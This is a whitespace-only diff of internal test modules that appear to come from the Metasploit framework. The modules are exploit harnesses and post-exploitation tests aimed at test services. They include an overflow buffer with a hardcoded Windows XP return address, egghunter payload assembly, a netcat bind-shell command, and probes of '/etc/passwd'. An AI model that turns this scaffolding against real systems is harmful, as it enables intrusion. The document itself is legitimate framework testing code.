Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Dialup
include Msf::Exploit::Remote::Dialup
def initialize(info = {})
super(update_info(info,
'Name' => 'Test Dialup Exploit',
'Description' => %q{
This exploit connects to a system's modem over dialup and provides
the user with a readout of the login banner.
},
'Version' => '$Revision$',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Test Dialup Exploit',
'Description' => %q{
This exploit connects to a system's modem over dialup and provides
the user with a readout of the login banner.
},
'Version' => '$Revision$',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def autofilter
false
end
def exploit
connect_dialup
handler
disconnect_dialup
end
def exploit
connect_dialup
handler
disconnect_dialup
end
end
test/modules/exploits/test/egghunter.rb
+66 -66
View File
@@ -12,87 +12,87 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Egghunter Test Exploit',
'Description' =>
"This module tests the exploitation of a test service using the Egghunter.",
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Egghunter Test Exploit',
'Description' =>
"This module tests the exploitation of a test service using the Egghunter.",
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0))
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
def exploit
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...")
print_status("Sending #{payload.encoded.length} byte payload...")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
sploit = ''
sploit = ''
# break before?
#sploit << "\xcc"
sploit << eh_stub
# just return otherwise
sploit << "\xc3"
# hopefully we find this!
sploit << eh_egg
# break before?
#sploit << "\xcc"
sploit << eh_stub
# just return otherwise
sploit << "\xc3"
# hopefully we find this!
sploit << eh_egg
sock.put(sploit)
sock.put(sploit)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
test/modules/exploits/test/exploitme.rb
+104 -104
View File
@@ -12,123 +12,123 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MIPS Aggressive Test Exploit',
'Description' => 'This module tests the exploitation of a test service',
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
#'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'MaxNops' => 0,
#'BadChars' => "\x00",
#'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Mips big endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE
}
],
[
'Mips big endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips big endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
[
'Mips little endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE
}
],
[
'Mips little endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips little endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
def initialize(info = {})
super(update_info(info,
'Name' => 'MIPS Aggressive Test Exploit',
'Description' => 'This module tests the exploitation of a test service',
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
#'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'MaxNops' => 0,
#'BadChars' => "\x00",
#'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Mips big endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE
}
],
[
'Mips big endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips big endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
[
'Mips little endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE
}
],
[
'Mips little endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips little endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
],
'DefaultTarget' => 0))
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
sock.put(payload.encoded)
sock.put(payload.encoded)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
test/modules/exploits/test/java_tester.rb
+35 -35
View File
@@ -13,46 +13,46 @@ require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
def initialize( info = {} )
super( update_info( info,
'Name' => 'Exec',
'Description' => %q{ },
'License' => MSF_LICENSE,
'Author' => [ 'egypt' ],
'Version' => '$Revision$',
'References' => [ ],
'Platform' => [ 'java', 'linux' ],
'Arch' => ARCH_JAVA,
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
} ],
[ 'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
} ],
],
'DefaultTarget' => 0
))
def initialize( info = {} )
super( update_info( info,
'Name' => 'Exec',
'Description' => %q{ },
'License' => MSF_LICENSE,
'Author' => [ 'egypt' ],
'Version' => '$Revision$',
'References' => [ ],
'Platform' => [ 'java', 'linux' ],
'Arch' => ARCH_JAVA,
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
} ],
[ 'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
} ],
],
'DefaultTarget' => 0
))
end
end
def exploit
# Equivalent to payload.encoded
@jar_data = payload.encoded_jar.pack
def exploit
# Equivalent to payload.encoded
@jar_data = payload.encoded_jar.pack
File.open("payload.jar", "wb") do |fd|
fd.write(@jar_data)
end
File.open("payload.jar", "wb") do |fd|
fd.write(@jar_data)
end
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
end
test/modules/exploits/test/kernel.rb
+59 -59
View File
@@ -15,74 +15,74 @@ require 'msf/core'
# This is a test exploit for testing kernel-mode payloads.
#
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Kernel-mode Test Exploit',
'Description' =>
"This module tests the exploitation of a kernel-mode test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
},
'Targets' =>
[
[
'Windows XP SP2',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin'
}
}
}
],
],
'DefaultTarget' => 0))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Kernel-mode Test Exploit',
'Description' =>
"This module tests the exploitation of a kernel-mode test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
},
'Targets' =>
[
[
'Windows XP SP2',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin'
}
}
}
],
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
connect_udp
def exploit
connect_udp
print_status("Sending #{payload.encoded.length} byte payload...")
print_status("Sending #{payload.encoded.length} byte payload...")
buf =
rand_text_alphanumeric(260) +
"\xbe\x7f\x00\x00" +
rand_text_alphanumeric(28) +
[target.ret].pack('V') +
rand_text_alphanumeric(8) +
payload.encoded
buf =
rand_text_alphanumeric(260) +
"\xbe\x7f\x00\x00" +
rand_text_alphanumeric(28) +
[target.ret].pack('V') +
rand_text_alphanumeric(8) +
payload.encoded
udp_sock.put(buf)
udp_sock.put(buf)
select(nil,nil,nil,2)
select(nil,nil,nil,2)
disconnect_udp
end
disconnect_udp
end
end
test/modules/exploits/test/shell.rb
+37 -37
View File
@@ -12,49 +12,49 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Test',
'Description' => %q{
This module tests cmd payloads by targeting (for example) a server
like: nc -l -p 31337 -e /bin/sh
},
'Author' => 'egypt',
'Version' => '$Revision$',
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Test',
'Description' => %q{
This module tests cmd payloads by targeting (for example) a server
like: nc -l -p 31337 -e /bin/sh
},
'Author' => 'egypt',
'Version' => '$Revision$',
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(31337),
], self.class)
end
register_options(
[
Opt::RPORT(31337),
], self.class)
end
def autofilter
false
end
def autofilter
false
end
def exploit
connect
def exploit
connect
sock.put(payload.encoded + "\n")
sock.put(payload.encoded + "\n")
handler
end
handler
end
end
test/modules/post/test/file.rb
+124 -124
View File
@@ -8,162 +8,162 @@ require 'module_test'
class Metasploit4 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Common
include Msf::Post::File
include Msf::ModuleTest::PostTest
include Msf::Post::Common
include Msf::Post::File
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote File Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote File Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back
#
def setup
@old_pwd = pwd
tmp = (directory?("/tmp")) ? "/tmp" : "%TMP%"
vprint_status("Setup: changing working directory to #{tmp}")
cd(tmp)
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back
#
def setup
@old_pwd = pwd
tmp = (directory?("/tmp")) ? "/tmp" : "%TMP%"
vprint_status("Setup: changing working directory to #{tmp}")
cd(tmp)
super
end
super
end
def test_file
it "should test for file existence" do
ret = false
[
"c:\\boot.ini",
"c:\\pagefile.sys",
"/etc/passwd",
"/etc/master.passwd"
].each { |path|
ret = true if file?(path)
}
def test_file
it "should test for file existence" do
ret = false
[
"c:\\boot.ini",
"c:\\pagefile.sys",
"/etc/passwd",
"/etc/master.passwd"
].each { |path|
ret = true if file?(path)
}
ret
end
ret
end
it "should test for directory existence" do
ret = false
[
"c:\\",
"/etc/",
"/tmp"
].each { |path|
ret = true if directory?(path)
}
it "should test for directory existence" do
ret = false
[
"c:\\",
"/etc/",
"/tmp"
].each { |path|
ret = true if directory?(path)
}
ret
end
ret
end
it "should create text files" do
write_file("pwned", "foo")
it "should create text files" do
write_file("pwned", "foo")
file?("pwned")
end
file?("pwned")
end
it "should read the text we just wrote" do
f = read_file("pwned")
ret = ("foo" == f)
unless ret
print_error("Didn't read what we wrote, actual file on target: #{f}")
end
it "should read the text we just wrote" do
f = read_file("pwned")
ret = ("foo" == f)
unless ret
print_error("Didn't read what we wrote, actual file on target: #{f}")
end
ret
end
ret
end
it "should append text files" do
ret = true
append_file("pwned", "bar")
it "should append text files" do
ret = true
append_file("pwned", "bar")
ret &&= read_file("pwned") == "foobar"
append_file("pwned", "baz")
final_contents = read_file("pwned")
ret &&= final_contents == "foobarbaz"
unless ret
print_error("Didn't read what we wrote, actual file on target: #{final_contents}")
end
ret &&= read_file("pwned") == "foobar"
append_file("pwned", "baz")
final_contents = read_file("pwned")
ret &&= final_contents == "foobarbaz"
unless ret
print_error("Didn't read what we wrote, actual file on target: #{final_contents}")
end
ret
end
ret
end
it "should delete text files" do
file_rm("pwned")
it "should delete text files" do
file_rm("pwned")
not file_exist?("pwned")
end
not file_exist?("pwned")
end
it "should move files" do
# Make sure we don't have leftovers from a previous run
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
it "should move files" do
# Make sure we don't have leftovers from a previous run
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
# touch a new file
write_file("meterpreter-test", "")
# touch a new file
write_file("meterpreter-test", "")
rename_file("meterpreter-test", "meterpreter-test-moved")
res &&= exist?("meterpreter-test-moved")
res &&= !exist?("meterpreter-test")
rename_file("meterpreter-test", "meterpreter-test-moved")
res &&= exist?("meterpreter-test-moved")
res &&= !exist?("meterpreter-test")
# clean up
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
end
# clean up
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
end
end
end
def test_binary_files
def test_binary_files
#binary_data = ::File.read("/bin/ls")
binary_data = ::File.read("/bin/echo")
#binary_data = "\xff\x00\xff\xfe\xff\`$(echo blha)\`"
it "should write binary data" do
vprint_status "Writing #{binary_data.length} bytes"
t = Time.now
write_file("pwned", binary_data)
vprint_status("Finished in #{Time.now - t}")
#binary_data = ::File.read("/bin/ls")
binary_data = ::File.read("/bin/echo")
#binary_data = "\xff\x00\xff\xfe\xff\`$(echo blha)\`"
it "should write binary data" do
vprint_status "Writing #{binary_data.length} bytes"
t = Time.now
write_file("pwned", binary_data)
vprint_status("Finished in #{Time.now - t}")
file_exist?("pwned")
end
file_exist?("pwned")
end
it "should read the binary data we just wrote" do
bin = read_file("pwned")
vprint_status "Read #{bin.length} bytes"
it "should read the binary data we just wrote" do
bin = read_file("pwned")
vprint_status "Read #{bin.length} bytes"
bin == binary_data
end
bin == binary_data
end
it "should delete binary files" do
file_rm("pwned")
it "should delete binary files" do
file_rm("pwned")
not file_exist?("pwned")
end
not file_exist?("pwned")
end
it "should append binary data" do
write_file("pwned", "\xde\xad")
append_file("pwned", "\xbe\xef")
bin = read_file("pwned")
file_rm("pwned")
it "should append binary data" do
write_file("pwned", "\xde\xad")
append_file("pwned", "\xbe\xef")
bin = read_file("pwned")
file_rm("pwned")
bin == "\xde\xad\xbe\xef"
end
bin == "\xde\xad\xbe\xef"
end
end
end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
cd(@old_pwd)
super
end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
cd(@old_pwd)
super
end
end
test/modules/post/test/meterpreter.rb
+265 -265
View File
@@ -7,336 +7,336 @@ require 'module_test'
class Metasploit4 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::ModuleTest::PostTest
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Meterpreter Stuff',
'Description' => %q{ This module will test meterpreter API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter' ]
))
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Meterpreter Stuff',
'Description' => %q{ This module will test meterpreter API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
end
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back. This method is an implementation
# of post/test/file.rb's method of the same name, but without the Post::File
# dependency.
#
def setup
@old_pwd = session.fs.dir.getwd
stat = session.fs.file.stat("/tmp") rescue nil
if (stat and stat.directory?)
tmp = "/tmp"
else
tmp = session.fs.file.expand_path("%TMP%")
end
vprint_status("Setup: changing working directory to #{tmp}")
session.fs.dir.chdir(tmp)
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back. This method is an implementation
# of post/test/file.rb's method of the same name, but without the Post::File
# dependency.
#
def setup
@old_pwd = session.fs.dir.getwd
stat = session.fs.file.stat("/tmp") rescue nil
if (stat and stat.directory?)
tmp = "/tmp"
else
tmp = session.fs.file.expand_path("%TMP%")
end
vprint_status("Setup: changing working directory to #{tmp}")
session.fs.dir.chdir(tmp)
super
end
super
end
def test_sys_process
vprint_status("Starting process tests")
pid = nil
def test_sys_process
vprint_status("Starting process tests")
pid = nil
if session.commands.include? "stdapi_sys_process_getpid"
it "should return its own process id" do
pid = session.sys.process.getpid
vprint_status("Pid: #{pid}")
true
end
else
print_status("Session doesn't implement getpid, skipping test")
end
if session.commands.include? "stdapi_sys_process_getpid"
it "should return its own process id" do
pid = session.sys.process.getpid
vprint_status("Pid: #{pid}")
true
end
else
print_status("Session doesn't implement getpid, skipping test")
end
it "should return a list of processes" do
ret = true
list = session.sys.process.get_processes
ret &&= (list && list.length > 0)
if session.commands.include? "stdapi_sys_process_getpid"
pid ||= session.sys.process.getpid
process = list.find{ |p| p['pid'] == pid }
vprint_status("PID info: #{process.inspect}")
ret &&= !(process.nil?)
else
vprint_status("Session doesn't implement getpid, skipping sanity check")
end
it "should return a list of processes" do
ret = true
list = session.sys.process.get_processes
ret &&= (list && list.length > 0)
if session.commands.include? "stdapi_sys_process_getpid"
pid ||= session.sys.process.getpid
process = list.find{ |p| p['pid'] == pid }
vprint_status("PID info: #{process.inspect}")
ret &&= !(process.nil?)
else
vprint_status("Session doesn't implement getpid, skipping sanity check")
end
ret
end
ret
end
end
end
def test_sys_config
vprint_status("Starting system config tests")
def test_sys_config
vprint_status("Starting system config tests")
it "should return a user id" do
uid = session.sys.config.getuid
true
end
it "should return a user id" do
uid = session.sys.config.getuid
true
end
it "should return a sysinfo Hash" do
sysinfo = session.sys.config.sysinfo
true
end
end
it "should return a sysinfo Hash" do
sysinfo = session.sys.config.sysinfo
true
end
end
def test_net_config
unless (session.commands.include? "stdapi_net_config_get_interfaces")
vprint_status("This meterpreter does not implement get_interfaces, skipping tests")
return
end
def test_net_config
unless (session.commands.include? "stdapi_net_config_get_interfaces")
vprint_status("This meterpreter does not implement get_interfaces, skipping tests")
return
end
vprint_status("Starting networking tests")
vprint_status("Starting networking tests")
it "should return network interfaces" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
it "should return network interfaces" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
res
end
it "should have an interface that matches session_host" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
res
end
it "should have an interface that matches session_host" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
res &&= !! ifaces.find { |iface|
iface.addrs.find { |addr|
addr == session.session_host
}
}
res &&= !! ifaces.find { |iface|
iface.addrs.find { |addr|
addr == session.session_host
}
}
res
end
res
end
it "should return network routes" do
routes = session.net.config.get_routes
it "should return network routes" do
routes = session.net.config.get_routes
routes and routes.length > 0
end
routes and routes.length > 0
end
end
end
def test_fs
vprint_status("Starting filesystem tests")
def test_fs
vprint_status("Starting filesystem tests")
it "should return the proper directory separator" do
sysinfo = session.sys.config.sysinfo
if sysinfo["OS"] =~ /windows/i
sep = session.fs.file.separator
res = (sep == "\\")
else
sep = session.fs.file.separator
res = (sep == "/")
end
it "should return the proper directory separator" do
sysinfo = session.sys.config.sysinfo
if sysinfo["OS"] =~ /windows/i
sep = session.fs.file.separator
res = (sep == "\\")
else
sep = session.fs.file.separator
res = (sep == "/")
end
res
end
res
end
it "should return the current working directory" do
wd = session.fs.dir.pwd
vprint_status("CWD: #{wd}")
it "should return the current working directory" do
wd = session.fs.dir.pwd
vprint_status("CWD: #{wd}")
true
end
true
end
it "should list files in the current directory" do
session.fs.dir.entries
end
it "should list files in the current directory" do
session.fs.dir.entries
end
it "should stat a directory" do
dir = session.fs.dir.pwd
vprint_status("Current directory: #{dir.inspect}")
s = session.fs.file.stat(dir)
vprint_status("Stat of current directory: #{s.inspect}")
it "should stat a directory" do
dir = session.fs.dir.pwd
vprint_status("Current directory: #{dir.inspect}")
s = session.fs.file.stat(dir)
vprint_status("Stat of current directory: #{s.inspect}")
s.directory?
end
s.directory?
end
it "should create and remove a dir" do
res = create_directory("meterpreter-test")
if (res)
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
end
it "should create and remove a dir" do
res = create_directory("meterpreter-test")
if (res)
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
end
res
end
res
end
it "should change directories" do
res = create_directory("meterpreter-test")
it "should change directories" do
res = create_directory("meterpreter-test")
old_wd = session.fs.dir.pwd
vprint_status("Old CWD: #{old_wd}")
old_wd = session.fs.dir.pwd
vprint_status("Old CWD: #{old_wd}")
if res
session.fs.dir.chdir("meterpreter-test")
new_wd = session.fs.dir.pwd
vprint_status("New CWD: #{new_wd}")
res &&= (new_wd =~ /meterpreter-test$/)
if res
session.fs.dir.chdir("meterpreter-test")
new_wd = session.fs.dir.pwd
vprint_status("New CWD: #{new_wd}")
res &&= (new_wd =~ /meterpreter-test$/)
if res
session.fs.dir.chdir("..")
wd = session.fs.dir.pwd
vprint_status("Back to old CWD: #{wd}")
end
end
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
if res
session.fs.dir.chdir("..")
wd = session.fs.dir.pwd
vprint_status("Back to old CWD: #{wd}")
end
end
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
res
end
res
end
it "should create and remove files" do
res = true
res &&= session.fs.file.open("meterpreter-test", "wb") { |fd|
fd.write("test")
}
it "should create and remove files" do
res = true
res &&= session.fs.file.open("meterpreter-test", "wb") { |fd|
fd.write("test")
}
vprint_status("Wrote to meterpreter-test, checking contents")
res &&= session.fs.file.open("meterpreter-test", "rb") { |fd|
contents = fd.read
vprint_status("Wrote #{contents}")
(contents == "test")
}
vprint_status("Wrote to meterpreter-test, checking contents")
res &&= session.fs.file.open("meterpreter-test", "rb") { |fd|
contents = fd.read
vprint_status("Wrote #{contents}")
(contents == "test")
}
session.fs.file.rm("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
session.fs.file.rm("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
res
end
res
end
it "should upload a file" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
it "should upload a file" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res
fd = session.fs.file.new(remote, "rb")
uploaded_contents = fd.read
until (fd.eof?)
uploaded_contents << fd.read
end
fd.close
original_contents = ::File.read(local)
if res
fd = session.fs.file.new(remote, "rb")
uploaded_contents = fd.read
until (fd.eof?)
uploaded_contents << fd.read
end
fd.close
original_contents = ::File.read(local)
res &&= !!(uploaded_contents == original_contents)
end
res &&= !!(uploaded_contents == original_contents)
end
session.fs.file.rm(remote)
res
end
if session.commands.include?("stdapi_fs_file_move")
it "should move files" do
res = true
session.fs.file.rm(remote)
res
end
if session.commands.include?("stdapi_fs_file_move")
it "should move files" do
res = true
# Make sure we don't have leftovers from a previous run
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
# Make sure we don't have leftovers from a previous run
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
# touch a new file
fd = session.fs.file.open("meterpreter-test", "wb")
fd.close
# touch a new file
fd = session.fs.file.open("meterpreter-test", "wb")
fd.close
session.fs.file.mv("meterpreter-test", "meterpreter-test-moved")
entries = session.fs.dir.entries
res &&= entries.include?("meterpreter-test-moved")
res &&= !entries.include?("meterpreter-test")
session.fs.file.mv("meterpreter-test", "meterpreter-test-moved")
entries = session.fs.dir.entries
res &&= entries.include?("meterpreter-test-moved")
res &&= !entries.include?("meterpreter-test")
# clean up
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
# clean up
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
res
end
end
res
end
end
it "should do md5 and sha1 of files" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
